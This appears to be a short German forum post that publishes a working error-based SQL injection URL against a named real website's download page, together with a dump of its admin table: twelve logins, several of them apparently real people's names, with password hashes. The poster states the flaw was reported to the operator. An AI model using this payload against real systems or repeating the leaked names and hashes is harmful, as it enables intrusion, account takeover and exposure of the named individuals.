http://www.urano.de/index.php?inhalt=download&download=download&id=47
Query:
http://www.urano.de/index.php?inhalt=download' and (select 1 from(select count(*),concat(0x7e,(select mid((ifnull(cast(login as char),0x20)),1,54) from web01db1.pw_admin order by login limit 7,1),0x7e,floor(rand(0)*2))x from information_schema.character_sets group by x)a) and 'x'='x&download=download&id=47
Dump:
Database: web01db1 Table: pw_admin [12 entries] +----+--------------------+----------------------------------+ | id | login | pass | +----+--------------------+----------------------------------+ | 1 | superadmin | 4aa85af56a70bafbf2786cc83d254c7b | | 14 | superuser | 4aa85af56a70bafbf2786cc83d254c7b | | 24 | carla | 652e3c79486e49c7aee3b3b0fa3afeb7 | | 31 | Thomas | c5069e387fa20a0dfebbf09ef2b52977 | | 33 | Sandy Kuntze | 50f36a7f63cc2152437b9c6d87125984 | | 35 | Denise Hoffmann | b5dd7c2ddde8b01ffac3c2fd2645d3c8 | | 39 | Catherine Jessat | 77a60cfe9813864d603c68714cf6bbee | | 40 | Hosting | 2693245dae5e361522bd4763a23f854a | | 42 | BettinaBeck | 1b704c744a8e3765f372058d32fabfc1 | | 44 | jessica saueressig | ca783e21fdfd3765f009797479ee5ed4 | | 46 | Thomas Poth | 3584f7932d98de052bb64b818c3ec8a0 | | 48 | tobias.spindler | 1dc6fd622da77843bdf1ac16449cf698 | +----+--------------------+----------------------------------+
Soviel zu deren Werbung:
Ich habe diese Sicherheitslücke bereits dem Betreiber gemeldet und warte nun auf eine Antwort.
Bearbeitet von x4r4x, 31 October 2015 - 04:29 Uhr.